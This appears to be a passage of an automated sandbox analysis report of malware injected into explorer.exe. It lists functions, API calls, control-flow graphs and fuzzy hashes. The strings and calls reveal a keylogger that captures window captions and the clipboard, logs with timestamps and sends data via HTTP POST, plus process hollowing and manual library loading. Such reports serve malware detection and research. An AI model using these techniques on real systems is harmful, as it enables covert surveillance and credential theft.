                                                                                                                                        • Opcode Fuzzy Hash: 2f837a755a895473434a32e050b7527463e0e4cca2bc6569747b503d29e98a0a
                                                                                                                                        • Instruction Fuzzy Hash: 8541D970EC0348FBE7D0AB66DC19E1A3B6EFBD4754780D859FB068A640DB7194508BA1
                                                                                                                                        Function 02EF16B9 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 90stringCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(02EF582C), ref: 02EF16C4
                                                                                                                                        • lstrlenW.KERNEL32 ref: 02EF16DB
                                                                                                                                        • lstrlenW.KERNEL32 ref: 02EF16F3
                                                                                                                                        • wsprintfW.USER32 ref: 02EF1743
                                                                                                                                        • GetForegroundWindow.USER32 ref: 02EF174E
                                                                                                                                        • GetWindowTextW.USER32(00000000,02EF5850,00000800), ref: 02EF1767
                                                                                                                                        • GetClassNameW.USER32(00000000,02EF5850,00000800), ref: 02EF1774
                                                                                                                                        • lstrcmpW.KERNEL32(02EF5020,02EF5850), ref: 02EF1781
                                                                                                                                        • lstrcpyW.KERNEL32(02EF5020,02EF5850), ref: 02EF178D
                                                                                                                                        • wsprintfW.USER32 ref: 02EF17AD
                                                                                                                                        • lstrcatW.KERNEL32 ref: 02EF17C6
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(02EF582C), ref: 02EF17D3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
                                                                                                                                        • String ID: Clipboard -> $ New Window Caption -> $%s%s%s$%s%s%s%s
                                                                                                                                        • API String ID: 2651329914-3371406555
                                                                                                                                        • Opcode ID: 822ad708b9a90ccc1894f8bf3e8e6e5c7b2a8ac0dc23c4ff5f93fca43ab7e1ab
                                                                                                                                        • Instruction ID: 7e14fe499e39cf52d8a7d5fe8e23112c844dad85a40d8c9bc17c43db98c12080
                                                                                                                                        • Opcode Fuzzy Hash: 822ad708b9a90ccc1894f8bf3e8e6e5c7b2a8ac0dc23c4ff5f93fca43ab7e1ab
                                                                                                                                        • Instruction Fuzzy Hash: 0121DB30DC0248FBD3E02B27EC44A2B3F59EBC17547D4D864F70956541CB218C61C6B5
                                                                                                                                        Function 02EF25F1 Relevance: 15.1, APIs: 10, Instructions: 51threadprocessinjectionCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 02EF2603
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 02EF260B
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 02EF261B
                                                                                                                                        • Thread32First.KERNEL32(00000000,0000001C), ref: 02EF2629
                                                                                                                                        • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 02EF2648
                                                                                                                                        • SuspendThread.KERNEL32(00000000), ref: 02EF2658
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02EF2667
                                                                                                                                        • Thread32Next.KERNEL32(00000000,0000001C), ref: 02EF2677
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02EF2682
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1467098526-0
                                                                                                                                        • Opcode ID: b93adb883909f984c02d74c0c4b54f0d38b7fb8f8c06ef38dadb8edd9a64203e
                                                                                                                                        • Instruction ID: 224a5e0d2f9fd8a2c72ce2a7ac213b80287433bf7382216559d071adabf53c69
                                                                                                                                        • Opcode Fuzzy Hash: b93adb883909f984c02d74c0c4b54f0d38b7fb8f8c06ef38dadb8edd9a64203e
                                                                                                                                        • Instruction Fuzzy Hash: F5118671CC5240EFD7419F61A84CA6EBFA4EFC4705F41489AFB4692540D7308995CBA7
                                                                                                                                        Function 02EF20A1 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 294 2ef20a1-2ef20fc call 2ef240f call 2ef2a09 call 2ef298a call 2ef24cc 303 2ef20fe-2ef2115 294->303 304 2ef2117-2ef2123 294->304 307 2ef2127-2ef2129 303->307 304->307 308 2ef212f-2ef2166 RtlZeroMemory 307->308 309 2ef23fd-2ef240c call 2ef29eb 307->309 313 2ef216c-2ef2187 308->313 314 2ef23f5-2ef23fc 308->314 315 2ef21b9-2ef21cb 313->315 316 2ef2189-2ef219a call 2ef243d 313->316 314->309 321 2ef21cf-2ef21d1 315->321 322 2ef21ad 316->322 323 2ef219c-2ef21ab 316->323 324 2ef21d7-2ef2233 call 2ef288d 321->324 325 2ef23e2-2ef23e8 321->325 326 2ef21af-2ef21b7 322->326 323->326 334 2ef23db 324->334 335 2ef2239-2ef223e 324->335 329 2ef23ea-2ef23ec call 2ef29eb 325->329 330 2ef23f1 325->330 326->321 329->330 330->314 334->325 336 2ef2258-2ef2286 call 2ef2a09 wsprintfW 335->336 337 2ef2240-2ef2251 335->337 340 2ef229f-2ef22b6 336->340 341 2ef2288-2ef228a 336->341 337->336 347 2ef22b8-2ef22ee call 2ef2a09 wsprintfW 340->347 348 2ef22f5-2ef230f 340->348 342 2ef228b-2ef228e 341->342 343 2ef2299-2ef229b 342->343 344 2ef2290-2ef2295 342->344 343->340 344->342 346 2ef2297 344->346 346->340 347->348 352 2ef23b8-2ef23ce call 2ef29eb 348->352 353 2ef2315-2ef2328 348->353 361 2ef23d7 352->361 362 2ef23d0-2ef23d2 call 2ef29eb 352->362 353->352 356 2ef232e-2ef2344 call 2ef2a09 353->356 363 2ef2346-2ef2351 356->363 361->334 362->361 365 2ef2365-2ef237c 363->365 366 2ef2353-2ef2360 call 2ef29ce 363->366 370 2ef237e 365->370 371 2ef2380-2ef238d 365->371 366->365 370->371 371->363 372 2ef238f-2ef2393 371->372 373 2ef23ad-2ef23b4 call 2ef29eb 372->373 374 2ef2395 372->374 373->352 376 2ef2395 call 2ef29bd 374->376 377 2ef239a-2ef23a7 RtlMoveMemory 376->377 377->373
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02EF2A09: GetProcessHeap.KERNEL32(00000008,0000A000,02EF10BF), ref: 02EF2A0C
                                                                                                                                          • Part of subcall function 02EF2A09: RtlAllocateHeap.NTDLL(00000000), ref: 02EF2A13
                                                                                                                                          • Part of subcall function 02EF298A: lstrlen.KERNEL32(02EF4FE2,?,00000000,00000000,02EF20DD,74DE8A60,02EF4FE2,00000000), ref: 02EF2992
                                                                                                                                          • Part of subcall function 02EF298A: MultiByteToWideChar.KERNEL32(00000000,00000000,02EF4FE2,00000001,00000000,00000000), ref: 02EF29A4
                                                                                                                                          • Part of subcall function 02EF24CC: RtlZeroMemory.NTDLL(?,00000018), ref: 02EF24DE
                                                                                                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 02EF2139
                                                                                                                                        • wsprintfW.USER32 ref: 02EF2272
                                                                                                                                        • wsprintfW.USER32 ref: 02EF22DD
                                                                                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 02EF23A7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                                                                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                                                                                        • API String ID: 4204651544-1701262698
                                                                                                                                        • Opcode ID: a919847c549348b771cde4b0d21261d9e4d17e763332320aaea1864a166da73c
                                                                                                                                        • Instruction ID: e0bf68cc20a5bd853adda30c4381d14c29a194dbb089b95145628aeb7a2ecfe6
                                                                                                                                        • Opcode Fuzzy Hash: a919847c549348b771cde4b0d21261d9e4d17e763332320aaea1864a166da73c
                                                                                                                                        • Instruction Fuzzy Hash: A3A18B71688341AFD3909F69D884A2BBBE9EFC8744F40992DFB85C7250DB70D944CB62
                                                                                                                                        Function 02EF12AE Relevance: 7.6, APIs: 5, Instructions: 93stringCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 379 2ef12ae-2ef12bf 380 2ef13a6-2ef13ad 379->380 381 2ef12c5-2ef12c7 379->381 381->380 382 2ef12cd-2ef12cf 381->382 383 2ef12d4 call 2ef29bd 382->383 384 2ef12d9-2ef12fc lstrlen call 2ef2a09 383->384 387 2ef136e-2ef1377 call 2ef29eb 384->387 388 2ef12fe-2ef1327 call 2ef2841 RtlZeroMemory 384->388 393 2ef139d-2ef13a5 call 2ef29ae 387->393 394 2ef1379-2ef137d 387->394 395 2ef1329-2ef134f RtlMoveMemory call 2ef2569 388->395 396 2ef1353-2ef1369 RtlMoveMemory call 2ef2569 388->396 393->380 397 2ef137f-2ef1392 call 2ef255c PathMatchSpecA 394->397 395->388 405 2ef1351 395->405 396->387 406 2ef139b 397->406 407 2ef1394-2ef1397 397->407 405->387 406->393 407->397 408 2ef1399 407->408 408->393
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02EF29BD: VirtualAlloc.KERNEL32(00000000,00040744,00003000,00000040,02EF12D9,00000000,00000000,?,00000001), ref: 02EF29C7
                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 02EF12DC
                                                                                                                                          • Part of subcall function 02EF2A09: GetProcessHeap.KERNEL32(00000008,0000A000,02EF10BF), ref: 02EF2A0C
                                                                                                                                          • Part of subcall function 02EF2A09: RtlAllocateHeap.NTDLL(00000000), ref: 02EF2A13
                                                                                                                                        • PathMatchSpecA.SHLWAPI(?,00000000), ref: 02EF138A
                                                                                                                                          • Part of subcall function 02EF2841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,02EF1119,00000001), ref: 02EF2850
                                                                                                                                          • Part of subcall function 02EF2841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,02EF1119,00000001), ref: 02EF2855
                                                                                                                                        • RtlZeroMemory.NTDLL(00000000,00000104), ref: 02EF1316
                                                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 02EF1332
                                                                                                                                          • Part of subcall function 02EF2569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,02EF136E), ref: 02EF2591
                                                                                                                                          • Part of subcall function 02EF2569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 02EF259A
                                                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 02EF135F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2993730741-0
                                                                                                                                        • Opcode ID: 06288e7cbe7255666e51741d9afd979bbe4870a6fcdd3ea5855cc6e5dba542aa
                                                                                                                                        • Instruction ID: 6405d561c36b6bcc358b4d6c9e27ff9644af2aacf3b43949f3aaf73ddefc36a8
                                                                                                                                        • Opcode Fuzzy Hash: 06288e7cbe7255666e51741d9afd979bbe4870a6fcdd3ea5855cc6e5dba542aa
                                                                                                                                        • Instruction Fuzzy Hash: D721E170B85305DF8784EE29885497FB7DAABC4704B40A92EFF4AD7740DB34DC498A62
                                                                                                                                        Function 02EF1581 Relevance: 7.6, APIs: 5, Instructions: 66stringCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 409 2ef1581-2ef1592 411 2ef1598-2ef159b 409->411 412 2ef1624-2ef1628 409->412 413 2ef159d-2ef15a0 411->413 414 2ef15a7-2ef15b3 GlobalLock 411->414 413->414 415 2ef15a2-2ef15a5 413->415 416 2ef15b5-2ef15b9 414->416 417 2ef1623 414->417 415->412 415->414 418 2ef15bb-2ef15be 416->418 419 2ef15e9 416->419 417->412 420 2ef15e4-2ef15e7 418->420 421 2ef15c0-2ef15c3 418->421 422 2ef15eb-2ef15f2 call 2ef293e 419->422 420->422 423 2ef15c5-2ef15e2 lstrlenW call 2ef2a09 lstrcatW 421->423 424 2ef15f4-2ef15fd call 2ef2724 421->424 422->424 423->424 431 2ef15ff-2ef1608 lstrlenW 424->431 432 2ef161b-2ef1622 GlobalUnlock 424->432 431->432 433 2ef160a-2ef160e 431->433 432->417 434 2ef160f call 2ef16b9 433->434 435 2ef1614-2ef1616 call 2ef29eb 434->435 435->432
                                                                                                                                        APIs
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 02EF15A9
                                                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 02EF15C6
                                                                                                                                        • lstrcatW.KERNEL32(00000000,00000000), ref: 02EF15DC
                                                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 02EF1600
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 02EF161C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Globallstrlen$LockUnlocklstrcat
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1114890469-0
                                                                                                                                        • Opcode ID: dadb238a774472d20d66308882851d90a0cf8c09d25d8b532c82a66faa985ece
                                                                                                                                        • Instruction ID: a02c81cb65ad271d85b162e5b5a58d20b0fd72d5329440ecd65bbf280ac29334
                                                                                                                                        • Opcode Fuzzy Hash: dadb238a774472d20d66308882851d90a0cf8c09d25d8b532c82a66faa985ece
                                                                                                                                        • Instruction Fuzzy Hash: 1C016B32FC0149DB86E4667A6C586BE33AE9FD521C709E466FB0F9B100DF248C024650
                                                                                                                                        Function 02EF1BBD Relevance: 6.1, APIs: 4, Instructions: 101libraryloaderCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 437 2ef1bbd-2ef1bd2 438 2ef1c06-2ef1c0e 437->438 439 2ef1bd4 437->439 441 2ef1c69-2ef1c71 438->441 442 2ef1c10-2ef1c15 438->442 440 2ef1bd6-2ef1c04 RtlMoveMemory 439->440 440->438 440->440 443 2ef1c73-2ef1c85 441->443 444 2ef1cb1 441->444 445 2ef1c64-2ef1c67 442->445 443->444 446 2ef1c87-2ef1ca4 LdrProcessRelocationBlock 443->446 447 2ef1cb3-2ef1cb8 444->447 445->441 448 2ef1c17-2ef1c2a LoadLibraryA 445->448 446->444 449 2ef1ca6-2ef1caa 446->449 450 2ef1cbb-2ef1cbd 448->450 451 2ef1c30-2ef1c35 448->451 449->444 452 2ef1cac-2ef1caf 449->452 450->447 453 2ef1c5c-2ef1c5f 451->453 452->444 452->446 454 2ef1c37-2ef1c3b 453->454 455 2ef1c61 453->455 456 2ef1c3d-2ef1c40 454->456 457 2ef1c42-2ef1c45 454->457 455->445 458 2ef1c47-2ef1c51 GetProcAddress 456->458 457->458 458->450 459 2ef1c53-2ef1c59 458->459 459->453
                                                                                                                                        APIs
                                                                                                                                        • RtlMoveMemory.NTDLL(?,?,?), ref: 02EF1BF4
                                                                                                                                        • LoadLibraryA.KERNEL32(?,02EF5848,00000000,00000000,74DF2EE0,00000000,02EF19B6,?,?,?,00000001,?,00000000), ref: 02EF1C1C
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,-00000002), ref: 02EF1C49
                                                                                                                                        • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 02EF1C9A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3827878703-0
                                                                                                                                        • Opcode ID: 3305970d97e2c2bb9bea84910436b001c16efbd7e1ef3be9dda7bb8ee207255a
                                                                                                                                        • Instruction ID: e1ca1a5a69cd8dce046f8c095054a70f008ee8fb6077334a9c9a3cf498608ac0
                                                                                                                                        • Opcode Fuzzy Hash: 3305970d97e2c2bb9bea84910436b001c16efbd7e1ef3be9dda7bb8ee207255a
                                                                                                                                        • Instruction Fuzzy Hash: 7E318071780619EBCB9CCF29C884BA6B7A8BF0531CF14956DE94ECB600D731E855DBA0
                                                                                                                                        Function 02EF182D Relevance: 6.0, APIs: 4, Instructions: 42sleepstringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(02EF582C), ref: 02EF1839
                                                                                                                                        • lstrlenW.KERNEL32 ref: 02EF1845
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(02EF582C), ref: 02EF18A9
                                                                                                                                        • Sleep.KERNEL32(00007530), ref: 02EF18B4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeaveSleeplstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2134730579-0
                                                                                                                                        • Opcode ID: ec5022b730ae7f51243f1977cf300f8f5b00094e624f1f704fd910ca950d3bbc
                                                                                                                                        • Instruction ID: d35de0c5aea73aeac976c73c19284bc053ff3f4779a4172fa442178bad418c17
                                                                                                                                        • Opcode Fuzzy Hash: ec5022b730ae7f51243f1977cf300f8f5b00094e624f1f704fd910ca950d3bbc
                                                                                                                                        • Instruction Fuzzy Hash: 3401A230DD0640EBD7D4A7A6ED2892E3AAAEBC17007909429FB058B240DB308951DFB2
                                                                                                                                        Function 02EF26C9 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,02EF11DD), ref: 02EF26DB
                                                                                                                                        • IsWow64Process.KERNEL32(000000FF,?), ref: 02EF26ED
                                                                                                                                        • IsWow64Process.KERNEL32(00000000,?), ref: 02EF2700
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02EF2716
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$Wow64$CloseHandleOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 331459951-0
                                                                                                                                        • Opcode ID: 2ce7bae0c469c4db1a9138d0d900d86984f6daeaeb5f53eefb55f00a981dba0a
                                                                                                                                        • Instruction ID: 6b589f9d88cd65ce2e096f085071eb028b884a42aa7abd3b85b2763f077f41ee
                                                                                                                                        • Opcode Fuzzy Hash: 2ce7bae0c469c4db1a9138d0d900d86984f6daeaeb5f53eefb55f00a981dba0a
                                                                                                                                        • Instruction Fuzzy Hash: F3F09071CC2218FF9B50CFA19D488EEB7BCEF05259B5042AAEB0093180D7304E40E6A0
                                                                                                                                        Function 02EF17DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31timeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02EF2A09: GetProcessHeap.KERNEL32(00000008,0000A000,02EF10BF), ref: 02EF2A0C
                                                                                                                                          • Part of subcall function 02EF2A09: RtlAllocateHeap.NTDLL(00000000), ref: 02EF2A13
                                                                                                                                        • GetLocalTime.KERNEL32(?,00000000), ref: 02EF17F3
                                                                                                                                        • wsprintfW.USER32 ref: 02EF181D
                                                                                                                                        Strings
                                                                                                                                        • [%02d.%02d.%d %02d:%02d:%02d], xrefs: 02EF1817
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                                                                                                        • String ID: [%02d.%02d.%d %02d:%02d:%02d]
                                                                                                                                        • API String ID: 377395780-613334611
                                                                                                                                        • Opcode ID: 7d48d51ccf8f1bf4655d7c0a9fc9ac4e46b63ae2bb8acbaa396395a1b7a1f79c
                                                                                                                                        • Instruction ID: bf752e84ed2c775600226390122fa2d863a5ee4572dc1ed6b40e0313928e9533
                                                                                                                                        • Opcode Fuzzy Hash: 7d48d51ccf8f1bf4655d7c0a9fc9ac4e46b63ae2bb8acbaa396395a1b7a1f79c
                                                                                                                                        • Instruction Fuzzy Hash: B2F03062D40128BA9B54ABDA9C058FFB3FCEB0CB02B40058AFB41E1180E67859A0D3B5

                                                                                                                                        Callgraph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        • Opacity -> Relevance
                                                                                                                                        • Disassembly available
                                                                                                                                        callgraph 0 Function_004D1C4C 1 Function_004DABCF 2 Function_004D4048 3 Function_004DB148 4 Function_004D27C4 5 Function_004D34C4 5->0 19 Function_004D1C6C 5->19 28 Function_004D1860 5->28 33 Function_004D1BF8 5->33 47 Function_004D1A88 5->47 49 Function_004D1D04 5->49 50 Function_004D2A04 5->50 64 Function_004D3394 5->64 68 Function_004D1CAC 5->68 74 Function_004D1D24 5->74 77 Function_004D19BC 5->77 82 Function_004D1838 5->82 6 Function_004D2DC0 6->82 7 Function_004D1FDC 34 Function_004D18F8 7->34 7->82 8 Function_004DB2DF 9 Function_004D3158 10 Function_004DB358 73 Function_004DB4A8 10->73 11 Function_004DB15B 12 Function_004D1D54 13 Function_004D14D4 14 Function_004D1254 15 Function_004DABD7 16 Function_004D18D0 17 Function_004DAAD2 18 Function_004D156C 20 Function_004DC0E9 21 Function_004D2768 75 Function_004D27A0 21->75 22 Function_004D18E8 23 Function_004D3068 23->19 23->28 70 Function_004D2E2C 23->70 81 Function_004D1938 23->81 23->82 24 Function_004DA8E8 25 Function_004DADEA 26 Function_004DB46A 27 Function_004D2664 28->19 29 Function_004D1560 30 Function_004DAFE3 31 Function_004D14F9 32 Function_004D5579 35 Function_004D26F8 35->19 35->27 55 Function_004D2580 35->55 36 Function_004D1EF8 37 Function_004D1EFA 38 Function_004D20F4 38->7 38->16 38->28 38->34 43 Function_004D188C 38->43 44 Function_004D1F0C 38->44 69 Function_004D20AC 38->69 38->77 38->82 39 Function_004D1576 40 Function_004DAFF6 41 Function_004DAC8D 42 Function_004D370C 42->5 42->19 42->42 71 Function_004D31AC 42->71 42->82 43->82 45 Function_004D5289 46 Function_004D1508 48 Function_004D1405 50->4 50->19 62 Function_004D2918 50->62 51 Function_004DB007 52 Function_004DA881 53 Function_004D1F00 54 Function_004D1000 56 Function_004DAD00 57 Function_004D4203 58 Function_004D141D 59 Function_004D1E9C 60 Function_004D1E1C 60->82 61 Function_004DAB9C 63 Function_004D2D14 63->22 63->28 63->60 80 Function_004D24B8 63->80 63->82 64->16 64->22 64->28 64->36 64->47 64->59 64->82 65 Function_004D4817 66 Function_004DB291 67 Function_004D1B10 69->47 70->6 70->28 70->43 71->12 71->28 71->35 71->67 72 Function_004D25A8 71->72 71->82 72->16 72->21 72->55 73->26 76 Function_004D1822 78 Function_004D2FBC 78->70 79 Function_004DB2BE 79->73 80->28 80->38 80->82 81->28 81->82 83 Function_004DAAB0 84 Function_004D4233 85 Function_004D14B2

                                                                                                                                        Executed Functions

                                                                                                                                        Function 004D370C Relevance: 1.6, APIs: 1, Instructions: 75nativeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 116 4d370c-4d371c call 4d1c6c 119 4d37b0-4d37b5 116->119 120 4d3722-4d3754 call 4d1838 116->120 124 4d3785-4d37aa NtUnmapViewOfSection 120->124 125 4d3756-4d375b call 4d1838 120->125 129 4d37bc-4d37cb call 4d34c4 124->129 130 4d37ac-4d37ae 124->130 127 4d3760-4d3779 125->127 127->124 136 4d37cd-4d37d0 call 4d370c 129->136 137 4d37d5-4d37de 129->137 130->119 132 4d37b6-4d37bb call 4d31ac 130->132 132->129 136->137
                                                                                                                                        APIs
                                                                                                                                        • NtUnmapViewOfSection.NTDLL ref: 004D378C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000015.00000002.4123104713.00000000004D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 004D1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_21_2_4d1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: SectionUnmapView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 498011366-0
                                                                                                                                        • Opcode ID: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                                                                                                        • Instruction ID: 82c65fae17e1e5de2419f14fb46055c329890a1d401718eba02ff3fbd049f8fb
                                                                                                                                        • Opcode Fuzzy Hash: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                                                                                                        • Instruction Fuzzy Hash: B6119374601D094BEB58FBB998AD27633E1E714316F54816FA815C73A2DE3D8A818705
                                                                                                                                        Function 004DB4A8 Relevance: 4.8, APIs: 3, Instructions: 252memorylibraryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 0 4db4a8-4db4ab 1 4db4b5-4db4b9 0->1 2 4db4bb-4db4c3 1->2 3 4db4c5 1->3 2->3 4 4db4ad-4db4b3 3->4 5 4db4c7 3->5 4->1 6 4db4ca-4db4d1 5->6 8 4db4dd 6->8 9 4db4d3-4db4db 6->9 8->6 10 4db4df-4db4e2 8->10 9->8 11 4db4e4-4db4f2 10->11 12 4db4f7-4db504 10->12 13 4db52e-4db549 11->13 14 4db4f4-4db4f5 11->14 22 4db51e-4db52c call 4db46a 12->22 23 4db506-4db508 12->23 15 4db57a-4db57d 13->15 14->12 17 4db57f-4db580 15->17 18 4db582-4db589 15->18 20 4db561-4db565 17->20 21 4db58f-4db593 18->21 24 4db54b-4db54e 20->24 25 4db567-4db56a 20->25 26 4db595-4db5ae LoadLibraryA 21->26 27 4db5f0-4db5f9 21->27 22->1 30 4db50b-4db512 23->30 24->18 29 4db550 24->29 25->18 31 4db56c-4db570 25->31 28 4db5af-4db5b6 26->28 32 4db5fc-4db605 27->32 28->21 35 4db5b8 28->35 36 4db551-4db555 29->36 50 4db51c 30->50 51 4db514-4db51a 30->51 31->36 37 4db572-4db579 31->37 38 4db62a-4db67a VirtualProtect * 2 32->38 39 4db607-4db609 32->39 40 4db5ba-4db5c2 35->40 41 4db5c4-4db5cc 35->41 36->20 42 4db557-4db559 36->42 37->15 46 4db67e-4db683 38->46 44 4db61c-4db628 39->44 45 4db60b-4db61a 39->45 48 4db5ce-4db5da 40->48 41->48 42->20 49 4db55b-4db55f 42->49 44->45 45->32 46->46 47 4db685-4db694 46->47 54 4db5dc-4db5e3 48->54 55 4db5e5-4db5ef 48->55 49->20 49->25 50->22 50->30 51->50 54->28
                                                                                                                                        APIs
